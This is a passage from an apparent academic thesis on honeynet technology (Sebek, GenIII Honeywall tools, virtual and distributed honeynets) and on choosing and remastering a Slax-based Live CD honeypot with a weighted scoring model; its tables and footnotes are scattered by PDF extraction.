or open() function, to its own data handling procedure. Thus, when a system call is
invoked, the respective data stream can be logged, before control is passed back to the
operating system. An overview about this process is illustrated in Figure 3.7.
The captured data is wrapped in a notification packet and is sent unidirectionally
across the network to the server for further analysis (cmp. Figure 3.8). Once it reaches
its destination, it may either be stored in a relational database, or it can be directly
processed on the command line with the sbk extract and sbk ks log.pl utilities. For example, to inspect a packet that is destined for port 1101 of the interface eth0, we must
execute the utilities as follows:
sbk_extract -i eth0 -p 1101 | sbk_ks_log . pl
11
see http://www.honeynet.org/tools/sebek/
28
Figure 3.7: Redirection of System Calls in the Sebek Monitoring Software
(Source: Based on Honeynet Project, 2003c)
Figure 3.8: Covert Data Channel Used by the Sebek Monitoring Software
(Source: Based on Honeynet Project, 2003c)
29
To mitigate the risk of detection, Sebek uses several mechanisms to hide its presence
from the eyes of probing blackhats: First, with the help of a cleaning component, the
application is removed from the list of loaded kernel modules. Second, the software
implements its own raw socket interface. As a consequence, the TCP/IP stack of the
operating system can be completely bypassed, and notification packets cannot be blocked
by firewall devices such as IPTables any longer. In addition, Sebek can be configured to
store a so-called magic value and a specific destination port number inside each packet.
If another system within the honeynet finds such a packet, it is silently ignored. Thus,
a covert channel is created, and intruders are unable to discover the data transfer even
if a network sniffing program such as TCPDump is run.
In spite of these features, adversaries have attempted to exploit architectural weaknesses in the Sebek client more recently in order to reveal the monitored environment.
For instance, Madsys (2003) presented a brute force algorithm that is capable of finding traces of the Sebek module header in memory (see also Holz and Raynal, 2005a).
With similar memory inspection techniques, sensitive configuration parameters of the
keystroke logging utility could be disclosed or even changed (see Corey, 2004). These
parameters are also likely to be found when specific heuristic algorithms are applied (see
Dornseif et al., 2004b; Holz and Raynal, 2005a).
A different detection strategy was demonstrated in the work of Dornseif et al. (2004a)
with their proof of concept application Kebes: The software uses the mmap() function of
the system kernel to map the contents of a file directly into the internal address space.
As a result, logging operations could be fully circumvented, because the read() system
call was not invoked at any time. In addition, Keong (2004) succeeded in restoring the
original System Call Table on Microsoft Windows operating systems. In consequence,
Sebek could be completely disabled.
As can be seen, even sophisticated logging and monitoring technologies can often
be bypassed or actively manipulated by savvy attackers. Again, this highlights the
fact that multiple data capture layers are required for collecting extensive information
about Internet miscreants (cmp. Honeynet Project, 2004b). On the other hand, GenII
honeynets do not specify how this information is to be stored or accessed in a later
analysis (see Balas and Viecco, 2005). What is worse, many tools define their own data
format without considering relationships to other data capture sources. Due to these
incompatibilities, investigations of security-related incidents are made more difficult.
Therefore, second generation honeynets have been superseded by more organized and
structured architectures. We will have a closer look on these innovations in the following
section.
3.3 GenIII Honeynets
In 2004, members of the Honeynet Project started the development of a more advanced
type of honeynets (cmp. Honeynet Project, 2005d). These so-called GenIII honeynets
30
are commonly deployed to date and facilitate watching and analyzing malicious activities
on the Internet. They implement all the features of preceding technologies, including the
transparent network bridging, data control, and data capture capabilities. In comparison
to GenII honeynets, they are significantly easier to set up though. With the bootable
CD-ROM Roo12 , the entire Honeywall can be automatically installed to hard disk within
minutes. At the end of the installation process, security professionals may then launch
a graphical user interface in order to configure the individual components. Hence, a
fully working honeynet gateway can be deployed within a short amount of time (see also
Provos and Holz, 2007, and Chapter 5).
In addition, several new applications that are part of the Roo CD greatly support
post-incident investigations (cmp. Balas and Viecco, 2005): For example, Argus13 (Audit
Record Generation and Usage System) is a monitoring system that processes all traffic
in real time. In contrast to IPTables or Snort, it is able to delimit single network flows.
A flow is a set of packets that are bi-directionally transferred between two computer
systems (cmp. Handelman et al., 1999; Paxson et al., 1998). Each flow is characterized
by a start and end time and contains qualitative information such as the destination
and source address, as well as quantitative information, e.g., the number of transmitted
bytes and packets (see Brownlee et al., 1997; QoSient, 2006). As a result, system probes
and penetration attempts can be clearly separated from other, unrelated events in the
honeynet and examined in more detail.
With the passive fingerprinting utility p0f14 , it is possible to determine the operating
system of a remote system. (cmp. Zalewski, 2005). When a connection is initiated with
a honeypot, inbound network packets are intercepted on the level of the Honeywall,
before they are forwarded to the respective machine. By finding subtle discrepancies in
the packet headers, p0f is then capable of creating a unique fingerprint of the host and
identifying the system platform in question. For these purposes, the packet metrics as
illustrated in Table 3.3 have proven helpful (see also Honeynet Project, 2002b; Stevens,
1994).
Compared to other fingerprinting tools such as nmap15 or xprobe16 , these operations
are often slightly less accurate, because p0f solely processes captured network data and
does not actively interact with the target system (see Zalewski, 2006). On the other
hand, due to this characteristic, the utility cannot be detected either and, therefore,
perfectly meets the requirements of the Honeynet Project (2004a).
Another crucial component in GenIII honeynets is the hflow daemon. It continually
interacts with different data capture sources, including Snort, Sebek, Argus, and p0f, to
create a unified data set that is independent from application-specific format definitions
(see Balas and Viecco, 2005). The information is hierarchically structured and stored in
12
see
see
14
see
15
see
16
see
13
https://projects.honeynet.org/honeywall/
http://www.qosient.com/argus/
http://lcamtuf.coredump.cx/p0f.shtml
http://insecure.org/nmap/
http://sourceforge.net/projects/xprobe
31
Metric
TTL Value
Don’t Fragment Flag
IPID Value
ToS Value
Window Size
Urgent Pointer Value
Description
The value of the Time to Live (TTL) field in the header of a
network packet is decreased whenever an intermediary device
is passed. Once it reaches zero, it is discarded to prevent
infinite loops. Because system vendors use different initial
values for the field, an analysis of the TTL value may help
reveal the system platform of the host (see also SWITCH,
2002).
If the Don’t Fragment (DF) flag is set, a network packet is
dropped in case it cannot be forwarded to another device
without fragmentation. This flag is not used by older operating systems.
The value of the IP Identification (IPID) field uniquely identifies a fragmented packet. In various operating system implementations, this field is always set to zero.
With the help of the Type of Service (ToS) field, the preferred
routing method can be indicated, e.g., to minimize network
delays or maximize reliability. However, on most operating
systems, this field is set to a fixed value.
The Window Size determines the number of bytes that can be
sent without acknowledgement. The value often corresponds
to the Maximum Segment Size (MSS) of a packet.
The value in the Urgent Pointer field must be set to zero
unless the URG flag is set in the header of a network packet.
However, in some platform implementations, this field is always initialized with a nonzero value.
Table 3.3: Metrics Used by the p0f Passive Fingerprinting Utility
(Source: Based on Zalewski, 2005; Stevens, 1994)
a relational database. Thus, alerts of the intrusion detection system can, for instance,
be correlated with processes and network flows. As a consequence, causal relationships
between logical entities can be quickly discovered. Therefore, the approach provides
“a more comprehensive representation of events” in contrast to GenII honeynets, as
Balas and Viecco (2005, p. 4) argue.
For administrative purposes, the data may be remotely accessed over the web-based interface Walleye. Walleye permits generating various summary and status reports about
activities within the honeynet (see also Honeynet Project, 2005d). The software also
supports exporting selected traffic flows in raw network format. As we will see in Chapter 5, these features enable security professionals to perform offline forensic investigations
32
with external applications such as Honeysnap17 which is used to efficiently recover attack
tools and clear text communications of adversaries. Last but not least, Walleye greatly
facilitates maintaining and configuring most parts of the Honeywall. For instance, it is
possible to restart stalled processes or completely shut down the gateway to block all
incoming and outgoing connections. Hence, administrators can stay in control of their
decoys at all times and are able to mitigate risks for the external environment as best
as possible.
3.4 Virtual Honeynets and Future Implementations
A large honeynet can be complex and expensive to administrate if each honeypot is
installed on its own physical machine. An alternative approach is the use of virtualization techniques similar to those described in Chapter 2. As we have explained, these
techniques can help keep hardware costs down and make the deployment of a virtual
honeynet easier (cmp. Provos and Holz, 2007).
Even though a virtual honeynet may be built on a single system, a hybrid solution
is more common in practice to date (cmp. Honeynet Project, 2003b). In this case, the
individual honeypots are deployed within virtual machines, while the Honeywall is run
on a dedicated machine (cmp. Figure 3.9). This architecture has several advantages
(see also Honeynet Project, 2004b): First, the implementation is more secure, because
the Honeywall is physically isolated from the electronic baits. Thus, even if an attacker
successfully compromises a virtual machine, the danger of getting privileged access to
the honeynet gateway is comparatively small.
Figure 3.9: Example of a Hybrid Virtual Honeynet
(Source: Based on Honeynet Project, 2003b)
17
see http://www.honeynet.org/tools/honeysnap/index.html
33
Figure 3.10: Example of a Distributed Honeynet (Source: Based on Spitzner, 2003c)
Second, the Honeywall operates independently from the honeypots. Consequently, its
performance level is not reduced if additional decoys are installed, and physical resources
must be shared between a higher number of virtual machines. Due to these reasons, we
favor the hybrid-based type in the scope of this thesis. A description of the corresponding
setup process is subject of Chapter 5.
A new variant of honeynets is still in development at the time of this writing. The
idea of these so-called distributed honeynets is the observation of adversaries on a large
scale, while minimizing costs and maintenance efforts at the same time (cmp. Honeynet
Project, 2004b). Although these objectives may appear contradictory at first sight, the
concept may be realized with honeypot farms. A honeypot farm is a consolidated network
of electronic baits running at a single location (see Spitzner, 2003c). It serves as a central
monitoring station for multiple, virtually distributed honeypots: With the help of a socalled virtual private network (VPN), administrators of smaller honeynets transparently
redirect their traffic to the honeypot farm. As a result, an attacker is tricked to be
interacting with a specific network segment, while in reality, she is targeting machines
which are possibly deployed in in a completely different part of the world. An illustration
of these operations is shown in Figure 3.10.
In comparison to traditional honeynets, the distributed architecture offers several
advantages (see Honeynet Project, 2004b; Spitzner, 2003c): On the one hand, security
professionals are able to quickly react to new threats, because resources, knowledge,
and expertise can be concentrated at the honeypot farm. On the other hand, the level
of involvement and risk of participating networks is decreased, because traffic flows
solely need to be forwarded. Consequently, these networks are not directly affected by
malicious activities.
However, it is also important to note that the technology is complex and challenging
(cmp. Honeynet Project, 2004b). Because traffic redirection causes network latencies,
suspicion may be raised on the side of intruders. In addition, global time synchronization
34
and data sanitization issues have to be addressed as well. If these problems are properly
solved though, a new generation of honeynets is likely to be released. For evaluation
purposes, a preliminary version can already be downloaded from the official web page
of the project18 .
3.5 Summary
This chapter provided an introduction to honeynet technology. A honeynet is a group
of honeypots that are set up and interconnected in an isolated, non-productive network
segment. In contrast to a single electronic bait, the architecture enables security professionals to observe adversaries on a larger scope and gain extensive information about
tools, tactics, and motives of adversaries. However, it is significantly more complex to
maintain and control, and potentially poses a severe threat to the external environment.
In order to minimize risks for uninvolved third parties as best as possible, we have
presented three central standards that must be carefully taken into consideration in the
deployment phase of a honeynet: First, data control mechanisms must ensure malicious
activities are safely contained within the honeynet. Second, data capture facilities need to
record suspicious traffic without raising the attention of attackers. Third and last, data
analysis technologies must facilitate network forensic and post-incident investigations.
As we have pointed out, the technical implementation of these standards has changed
over time and varies in different honeynet generations: GenI honeynets are only interesting for historical purposes. They solely provide rudimentary data control and data
capture functions and are comparatively easy to detect. GenII honeynets can greatly
mitigate these disadvantages by deploying a transparent bridge, the so-called Honeywall,
that is capable of stealthily intercepting inbound and outbound network connections.
Moreover, the device includes several data control as well as data capture layers: With
the help of the IPTables packet filtering software and the Snort Inline intrusion prevention system, it is possible to block or disable malicious packets going out of the honeynet.
Furthermore, the rule-based intrusion detection system Snort is able to record traffic
flows and identify penetration attempts at the network perimeter. Last but not least,
the monitoring utility Sebek permits capturing both the keystrokes and attack tools of
adversaries. It is directly installed on a decoy and regularly sends logged information
over a covert channel to the honeynet gateway.
One downside of GenII implementations are their heterogenous data sources and data
formats. Due to subtle incompatibilities between the different components, investigations of security-related incidents are complex and time-consuming. These issues are
addressed in GenIII honeynets by uploading the collected data to a central database.
The database can be comfortably accessed with the web interface Walleye.
In comparison to preceding technologies, GenIII honeynets are also easier to set up and
administrate. With the bootable CD-ROM Roo, the Honeywall can be automatically
18
see http://distributed.honeynets.org/
35
installed within minutes. In many cases, administrators use a dedicated machine for
these purposes, while they run the individual honeypots within virtual machines. This
hybrid approach permits keeping hardware costs down and reducing maintenance efforts.
We have also briefly described the fundamentals of distributed honeynets, an advanced
type of honeynets that is still in development at the time of this writing. By redirecting
traffic from smaller networks to a honeypot farm, it is hoped intruders can be watched
on a large scale. In spite of these premises, the architecture has to cope with various
challenges such as latency and time synchronization problems. For this reason, it must
be thoroughly evaluated, before a new generation of honeynets can be released.
The concepts outlined in the previous sections serve as a theoretical foundation for
our own honeynet implementation that is illustrated in detail in Chapter 5. In addition,
we present a so-called Live CD that makes the deployment phase of electronic baits
easier and helps security professionals collect autonomously spreading worms, viruses,
and other types of self propagating malware. The innovation process of this device is
subject of the following chapter.
36
4 Development of a Live CD-Based
Honeypot
Deploying a larger number of honeypots can be complex and laborious (cmp. Mokube
and Adams, 2007; Sadasivam et al., 2005). Operating systems as well as specific vulnerable services need to be installed, and monitoring devices must be adequately tuned.
However, many actions have to be repeated multiple times during the configuration process, e.g., setting network parameters or creating user accounts. These administrative
tasks are time-consuming but do not lead to a significant increase in knowledge and
expertise in the long term. With the help of a so-called Live CD, deployment and initialization of electronic decoys can be automated to a great extent, thus, facilitating the
work of security professionals and permitting them to focus on computer crime-related
incidents.
A Live CD comprises a complete operating system as well as a number of selected applications and “is typically designed to boot and run entirely from a read-only medium”
(Negus, 2007, p. 7). At runtime, data is copied to and solely modified in volatile memory.
When the system is shutdown or rebooted, all changes are reset. These characteristics
make Live CDs perfectly suited for honeypot-based research, as a decoy can be quickly
put back online after a compromise without major modifications.
In the course of this thesis, we develop our own derivative of such a CD. End-users are
able to boot our disk and start a pre-configured, fully working low-interaction honeypot
with a simple click. Thereby, it is possible to deploy numerous electronic baits and
collect data on a large scale within a short amount of time.
With respect to the development process, it is important to note that we do not have
to create our system from scratch. At the time of this writing, more than 300 different
Live CDs are already available (see Brand, 2007). For this reason, we may use an existing
distribution and remaster it according to our requirements, i.e., we substantially change
the base of the system and adapt existing features to our needs.
In order to choose an appropriate candidate, an evaluation of each CD would be out of
the scope though. We are not aware of any scientific work on the relative performance of
Live CDs either. Therefore, we only assess the most popular versions as listed by Jordan
(2006) and select the most promising distribution as a starting point for our remastering
project.
37
This chapter is outlined as follows: In the upcoming section, we give a short overview
about the most prevalent Live CDs. We assess the different distributions according
to a set of pre-defined decision attributes and select the candidate that best matches
our requirements. The corresponding evaluation and selection model is subject of Section 4.2. A description of the development and remastering process of our own Live CD
is presented in the third section of this chapter. With the help of a preliminary but
fully-working prototype, we are able to capture autonomously spreading malware on a
large scale and analyze threats that are commonly found on the Internet at the time of
this writing. A summary of the results of our research is given in Section 4.3.4.
4.1 Overview about Popular Live CD Distributions
According to Jordan (2006), the top Live CD distributions are Knoppix, Kanotix, SimplyMEPIS, PCLinuxOS, Slax, and Ubuntu. We briefly illustrate the major characteristics
and features of these CDs in the following.
• Knoppix: Knoppix1 is a popular free Live CD developed by Klaus Knopper and is
regarded as “the most mature and widely used bootable Linux CD” (Negus, 2007,
p. 24). Software packages include a complete desktop environment with office,
Internet, and multimedia applications. Hardware support and compatibility are
excellent (cmp. FrozenTech, 2004b).
Due to its extensive modification possibilities (FrozenTech, 2005a) and a vivid community, a lot of other distributions are derived from Knoppix, e.g., the modularbased version Morphix2 or Knoppix-STD3 , a Live CD that provides a vast collection
of security tools and addresses the needs of system administrators as well as penetration testers.
• Kanotix: Kanotix4 is a Debian-based Live CD and free of charge. It is especially
known for its outstanding hardware support (see FrozenTech, 2004b) and contains
a lot of additional software packages.
Remastering Kanotix is possible but quite difficult, because only a small amount
of official documentation does exist.
• SimplyMEPIS: In contrast to many other Linux distributions, SimplyMEPIS5 is a
commercial Live CD developed by Warren Woodford. The latest version is based
on Ubuntu (see below).
1
see
see
3
see
4
see
5
see
2
http://www.knoppix.org/
http://www.morphix.org/
http://s-t-d.org/
http://kanotix.com/
http://www.mepis.org/
38
One of the exceptional features of SimplyMEPIS is its ability to be used not only as
a Live CD, but as an entire operating system installed to hard disk. It is primarily
designed for everyday computing but may be remastered with some effort. Official
guides and manuals facilitate these activities.
• PCLinuxOS: PCLinuxOS6 is a free Live CD for private end-users and is one of
the few distributions derived from Mandrake. Its hardware support is very good.
As Jordan (2006) states, “compared to Knoppix, MEPIS and Kanotix, there are
fewer applications” though.
Adapting the CD is comparatively easy due to a number of scripts that permit
quick modifications of the whole system.
• Slax: Slax7 is a well-known distribution (cmp. FrozenTech, 2004a) and is based
on Slackware as the name suggests. It is free of charge and is primarily used for
private purposes. Because of its small size, the distribution may be copied to a
USB flash drive. Similar to Knoppix, its hardware support is excellent.
One of Slax’s unique features is its modular design: Modules contain one or more
specific software applications and may be added or removed without affecting other
parts of the system. This makes remastering the Live CD extremely easy. In case
developers still require help, they are supported by a growing community and
several step-by-step guides.
• Ubuntu: Ubuntu8 is a free, desktop- and multimedia-oriented Debian derivative
by Mark Shuttleworth. At the time of this writing, it heads the list of the most
popular Linux distributions (see DistroWatch, 2007). Presumably, this position
may also be attributed to its outstanding usability (cmp. FrozenTech, 2005b).
Similar to SimplyMEPIS, Ubuntu may function both as a Live CD as well as
an operating system copied to hard disk. Remastering activities require an indepth knowledge of the underlying system, even though the individual segments
are extensively documented.
The main characteristics of each distribution are summarized in Table 4.1. These Live
CDs are assessed and evaluated upon our own selection model which is presented in the
next section.
6
see http://www.pclinuxos.com/
see http://www.slax.org/
8
see http://www.ubuntu.com/
7
39
Distribution
Knoppix
Kanotix
SimplyMEPIS
PCLinuxOS
Slax
Ubuntu
Assessed Version
5.11
2007-RC6
6.5
2007
6-RC6
7.10
Size
700 MB
701 MB
693 MB
299-685 MB
41-202 MB
697 MB
Based on
Debian
Debian
Ubuntu
Mandriva
Slackware
Debian
Kernel Version
2.6.19
2.6.22
2.6.15
2.6.18.8
2.6.21.5
2.6.22
Table 4.1: Main Characteristics of Live CD Distributions
(Source Brand, 2007; Wikipedia, 2007)
4.2 Selection Model for the Live CD Distributions
To come to a rational decision and choose an adequate candidate for our own distribution, we go through a sequential selection process as indicated in Figure 4.1: First,
we identify several influencing factors that greatly affect the development and later use
of our CD. We refer to those factors as attributes in the following. However, we do
not consider all attributes as equal. Therefore, we use weights to express their relative
importance. Finally, we apply a well-known scoring model on all distributions to make
a recommendation.
Figure 4.1: Selection Process for the Live CD Distributions
40
4.2.1 Overview about the Decision Attributes
Attributes “provide a means of evaluating goal accomplishments” (Yoon and Hwang,
1995, p. 8). Concerning our decision problem, we identify five different attributes, legal
restrictions and licensing, hardware compatibility, usability, ease of adaptability, and
documentation and official support, as crucial. A short description of each attribute is
presented below.
• Legal restrictions and licensing: The release version of our Live CD will be freely
distributed over the Internet for research purposes and as open source, i.e., the
entire source code will be available for future modifications by third parties (cmp.
Perens, 1998). For this reason, the base distribution must be published under the
GNU General Public License (GNU GPL, see Free Software Foundation, 2007) or
a similar licence that permits legal copying and adaptation without any charges.
• Hardware compatibility: The CD is supposed to run quickly after startup on different types of computer systems. Therefore, the base system needs to support
common hardware devices, especially network interface cards and display adapters.
Ideally, these devices are properly configured after booting without any significant
manual intervention. For example, network parameters and IP address information
are to be automatically set if the system is connected to a server with DHCP (Dynamic Host Configuration Protocol) support.
• Usability: Even though the CD is expected to be used mostly by network administrators and security professionals with a strong computer background, its
design needs to be as intuitive and as easy as possible, i.e., the honeypot should be
started in a user-friendly, graphical environment. Furthermore, common administrative tasks, e.g., changing the password of the superuser, should be carried out
quickly to permit focusing on data collection- and analysis-related activities.
• Ease of adaptability: The CD must be easily adaptable, i.e., the basis of the distribution needs to extendable and must provide sophisticated package management
tools to permit installation, modification, and removal of software applications.
• Documentation and official support: Remastering a Live CD is a complex task
and requires a thorough understanding of the underlying operating system. Stepby-step guides, collaborative platforms such as forums, and officially supported
manuals can strongly facilitate this process and are therefore regarded as a plus.
As we have already mentioned, these attributes are not equally important to us. For
this reason, we apply a basic weighting technique that is outlined in the next section.
41
4.2.2 Calculation of the Decision Weights
With the help of weights, we are able to indicate the relative importance and prioritization of the individual attributes in a quantitative way. According to Yoon and Hwang
(1995, p. 11), one possibility to assess those weights is “to arrange the attributes in a
simple rank order, listing the most important attribute first and the least important attribute last”. Then, for n attributes, we simply apply the following formula to calculate
the weight wj for the jth attribute and rank rj (see Stillwell et al., 1981):
wj =
n − rj + 1
(4.1)
n
X
(n − rk + 1)
k=1
With regard to our evaluation, we assign the following ranks to the different attributes:
Legal restrictions and licence fees have the greatest impact on the development and future distribution of our CD. For this reason, we rank this attribute as most important.
Depending on the ease of adaptability as well as the amount of documentation and official support, remastering the base system can be significantly facilitated or made more
difficult. Thus, these attributes are ranked second and third. Finally, hardware compatibility and usability are considered least important, because they have minor effects
on the development process. A summary of the attribute ranks and their corresponding
calculated weights is given in Table 4.2.
Attribute
Legal restrictions and licensing
Hardware compatibility
Usability
Ease of adaptability
Documentation and Official support
Attribute Rank
1
4
5
2
3
Attribute Weight
0.33
0.13
0.07
0.27
0.2
Table 4.2: Attribute Ranks and Weights for the Candidate CDs
4.2.3 Overview about the Scoring Model
Considering our five candidate CDs and the different evaluation criteria, we have a
classic Multiple Attribute Decision Making (MADM) problem, i.e., we need to make a
preference decision over a number of given alternatives that are characterized by multiple
attributes (cmp. Yoon and Hwang, 1995). Several approaches are recommended in the
literature to solve such as problem (see also Yoon and Hwang, 1981): For instance, the
Simple Additive Weighting (SAW) technique is a well-known scoring model which is both
robust and easy to apply (cmp. Rowe and Pierce, 1982). With the SAW technique, we
42
Figure 4.2: Example of an Ordinal Rating Scale
can compute a weighted sum for each Live CD, favoring the alternative with the highest
result.
Mathematically, the weighted sum for an alternative Ai can be expressed as a value
function V (Ai ) as shown in Formula 4.2, where rij is the jth attribute value of the ith
alternative, and wj refers to the corresponding attribute weight.
V (Ai ) =
n
X
wj · rij
i = 1, . . . ,m
(4.2)
j=1
Attribute values are derived from a five-point ordinal scale that measures the relative
performance of an alternative in comparison to other candidates for a given attribute. A
value of 1 indicates relatively very bad performance, while a value of 5 reflects relatively
very high performance. If an alternative is relatively comparable to others, we assign a
neutral value of 3. This process is illustrated in Figure 4.2.
We can now calculate the attribute values for all alternatives and apply the SAW
scoring model in order to choose an adequate candidate for our own Live CD. These
operations are subject of the next section.
4.2.4 Selection of an Adequate Candidate CD
We use the ordinal five-point scale as outlined in the previous section to assign attribute
values to the different alternatives. The ratings are based upon our own evaluation and
surveys by FrozenTech (2004b,a, 2005a,b). The final results are shown in Table 4.3.
Concerning the attribute legal restrictions and licensing, all alternatives are assigned
the neutral value 3, because they are freely available over the Internet, except from SimplyMEPIS which is distributed under a commercial licence. That is why, this Live CD is
depreciated in comparison to all other candidates. Kanotix has a superior hardware compatibility and is therefore assigned with the highest attribute value. Knoppix, Slax, and
PCLinuxOS have a slightly better hardware support in comparison to SimplyMEPIS and
Ubuntu. The usability of most candidate distributions is outstanding, only PCLinuxOS
performs below average because of its limited amount of applications. Slax is easiest
to adapt due to its modular design, closely followed by PCLinuxOS. SimplyMEPIS and
Ubuntu are relatively difficult to remaster since they require a more thorough under-
43
Distribution
Knoppix
Kanotix
SimplyMEPIS
PCLinuxOS
Slax
Ubuntu
Legal Restrictions
and
Licensing
Hardware
Compatibility
Usability
Ease of
Adaptability
3
3
4
5
4
4
3
3
Documentation
and
Official
Support
5
1
1
3
3
2
3
3
4
2
4
4
3
3
4
3
4
5
5
2
3
4
Table 4.3: Attribute Values for the Candidate CDs
standing of the base system. Finally, Knoppix is leading regarding documentation and
official support. Many guides, manuals, and collaborative platforms facilitate modifications of the CD, similar to PCLinuxOS and Ubuntu. In contrast, Kanotix is extremely
badly documented and, hence, is assigned with an attribute value of 1.
As we have already explained, these attribute values are multiplied with the corresponding attribute weights to compute the weighted sum for each alternative in accordance to Formula 4.2. As can be seen in Table 4.4, Slax is considered to be the best
choice for our own Live CD with a weighted sum of 3.7. Good alternative candidates are
Knoppix and PCLinuxOS as well. The results are not very surprising as the distributions are well-engineered, while being easy to use and adapt at the same time. Kanotix
is rated slightly below average due to its lack of official documentation. In comparison
to leading Live CDs, Ubuntu does not have any significant advantages, except from its
usability. SimplyMEPIS is, on the whole, regarded as a rather unsatisfactory solution,
mainly because of its commercial licence.
To test the robustness of our decision, we perform a sensitivity analysis, i.e., we change
the significance of different attributes, repeat the computation step, and compare the
newly generated weighted sums with the original values. In consequence, we consider
the attribute ease of adaptability as the most important decision criterion, followed by
hardware compatibility, and legal restrictions and licensing. Documentation and official
support and usability are ranked 4th and 5th. The results of the sensitivity analysis are
listed in Table 4.5. As can be seen, Slax is still the leading alternative, while PCLinuxOS
is now preferred upon Knoppix. Kanotix performs slightly better than Ubuntu. The
rating of SimplyMEPIS remains stable.
44
Distribution
Knoppix
Kanotix
SimplyMEPIS
PCLinuxOS
Slax
Ubuntu
Documentation P
and
Official
Support
1
3.6
0.2
2.9
Legal Restrictions
and
Licensing
Hardware
Compatibility
Usability
Ease of
Adaptability
1
1
0.53
0.67
0.27
0.27
0.8
0.8
0.33
0.4
0.2
0.53
0.6
2.1
1
0.53
0.13
1.07
0.8
3.5
1
1
0.53
0.4
0.27
0.33
1.33
0.53
0.6
0.8
3.7
3.1
Table 4.4: Attribute Ratings and Weighted Sums for the Live CDs
Distribution
Knoppix
Kanotix
SimplyMEPIS
PCLinuxOS
Slax
Ubuntu
Documentation P
and
official
Support
0.67
3.6
0.13
3.3
Legal Restrictions
and
Licensing
Hardware
Compatibility
Usability
Ease of
Adaptability
0.6
0.6
1.07
1.33
0.27
0.27
1
1
0.2
0.8
0.2
0.67
0.4
2.3
0.6
1.07
0.13
1.33
0.53
3.7
0.6
0.6
1.07
0.8
0.27
0.33
1.67
0.67
0.4
0.53
4.0
2.9
Table 4.5: Weighted Sums for the Live CDs after the Sensitivity Analysis
45
4.2.5 Summary of the Methodology
To select an adequate distribution as a basis for our own Live CD, we have assessed
six potential candidates upon a list of multiple attributes, namely legal restrictions and
licensing, hardware compatibility, usability, ease of adaptibility, and documentation and
official support. Since not all attributes were equally important to us, we have applied
weights to indicate their relative significance. These weights were used as input parameters to the Simple Additive Weighting model. The model computes a total evaluation
score for each alternative, the so-called weighted sum. Under consideration of the given
attributes, the alternative with the highest weighted sum is favored, in our case, the
Slackware-based distribution Slax. We were able to verify this result by performing a
sensitivity analysis. However, it needs to be emphasized that parts of our assessment
still remain subjective, e.g., when assigning weights or attribute values. Thus, other
distributions may likely be utilized to create a Live CD-based honeypot as well. For example, the CD developed by the SurfIDS project (see Chapter 2) is built upon Knoppix.
Hence, our choice is eventually also a matter of personal preference.
The following explanations refer to the modification and customization of the Slax
Live CD.
4.3 Development and Remastering Process of the
Live CD
As we have outlined in the previous section, we use Slax as a foundation for our own
Live CD-based honeypot. However, a good understanding of the base architecture is
required in order to successfully remaster the CD and adapt it to our needs. For this
reason, we give a brief overview about the technical implementation of the distribution
before explaining the development process in detail.
4.3.1 Technical Architecture of Slax
4.3.1.1 Boot Sequence
Similar to other Live CDs, Slax is compliant with the so-called El Torito standard, a
format specification that describes how to make a CD bootable (see Stevens and Merkin,
1995). Thus, when the computer is powered on, the system BIOS is able to invoke a
boot loader on the CD. The boot loader presents a list of valid boot images to the user
and determines the parameters and additional options the operating system is started
with. When such an image is launched, control is passed to the Linux kernel, and an
initial ram disk is mounted into memory. This disk serves as a root file system and
contains a small number of applications which are needed for further initialization tasks.
Most importantly, the special script linuxrc gets executed. Linuxrc is responsible for
46
Figure 4.3: Boot Sequence of the Slax Live CD
loading essential hardware drivers and creating a temporary live file system to permit
later access to programs and files. Finally, the first process of the operating system,
init, is run which serves as a parent for all other services and daemons. Depending on
a run level, init makes different sets of programs and applications available, by default,
a graphical desktop manager with multiuser support.
A summary illustration of the boot sequence is given in Figure 4.3. We will have a
closer look on the individual phases in a later section (see also Negus, 2007; Jones, 2006a).
First of all, however, we describe the file storage and file maintenance mechanisms used
by the distribution.
4.3.1.2 File Systems
Slax relies on two special file systems in order to store and manage files efficiently.
• SquashFS: The SquashFS9 file system is used to compress files and entire directory structures. Thereby, it is possible to keep the size of the distribution moderately small while providing a decent number of applications. By applying a
high-performance compression algorithm such as Lempel-Ziv-Markov (LZM), the
compression ratio can be even increased (see also Lougher and Okajima, 2008).
However, one major disadvantage of SquashFS is that is solely capable of saving
data in read-only mode. Therefore, operations which require write permissions
must be executed on a second, flanking file system.
9
see http://squashfs.sourceforge.net/
47
• Aufs: Due to the limitations of SquashFS and the physical characteristics of CDROMs, content is always only accessible in read-only mode. During a user session,
system settings need to be frequently altered and updated though. To circumvent
these restrictions, files must be temporarily shifted into writable sections of volatile
memory. In theory, multiple possibilities do exist to realize this operation. For
instance, it is possible to copy the entire root directory tree completely into RAM
in order to make the full disk available. However, this approach is not satisfactory,
because large portions of space are consumed.
Another option is to restrict modifications to certain parts of the system, for
example, the home directory of a user. This solution is not convincing either
because it makes reconfigurations and new installations significantly more difficult.
To overcome the said obstacles, Live CDs frequently implement so-called union
file systems. These types of file systems are able to merge read-only systems
such as SquashFS with a special directory in memory which possesses full access
permissions (cmp. Wright et al., 2004). The result of those joined directories is
called a union.
When a file needs to be changed, it is transparently transferred from the read-only
section to the writable branch of the union. This process is known as a copyup.
Thereby, while the file may be temporarily modified in memory, its original physical
instance is never touched. Consequently, the union acts as a virtual overlay for
the underlying disk structure of the CD (cmp. Figure 4.4).
Several software applications support the creation of union file systems. Slax uses
aufs (Another Union File System)10 which is maintained by Junjiro Okajima. It has
considerable advantages concerning the performance and stability over Unionfs, a
comparable solution which is more popular11 .
10
11
see http://aufs.sourceforge.net/
see http://www.am-utils.org/project-unionfs.html and the discussion on the mailing list of the
Stony Brook University, http://www.fsl.cs.sunysb.edu/
48
Figure 4.4: Illustration of the Union File System
4.3.1.3 File System Modules
In order to store programs and other software components on the CD, Slax uses a
number of file system modules. Each module saves a specific directory tree in compressed
format. When the system boots up, the modules are uncompressed and mounted into
a temporary union to create a global unified file system. As we have described in the
previous section, this operation is completely transparent to the end user.
A major advantage of the modular-oriented approach is that remastering the operating system is much more comfortable compared to other distributions. For instance,
to remove a set of applications with a certain behavior, it is sufficient to delete the
corresponding module. This process does not affect the functionality of other software
artifacts. In turn, Slax can be easily extended by developing new modules which are
automatically integrated by the system at startup. In fact, a huge collection of different
modules for various purposes is already available for download12 .
12
see http://www.slax.org/modules.php
49
By default, Slax defines nine base modules with numerous software packages. A software package provides a pre-configured, fully working application. A description of all
software packages can be found on the accompanying CD-ROM of this thesis, a short
overview about the base modules is given in Table 4.6.
As we have already indicated, the concepts outlined above need to be thoroughly
understood before starting to adapt the distribution. Furthermore, because changes may
greatly affect system stability and performance, we recommend to plan and document
all modifications in advance. The project specifications for our Live CD are presented
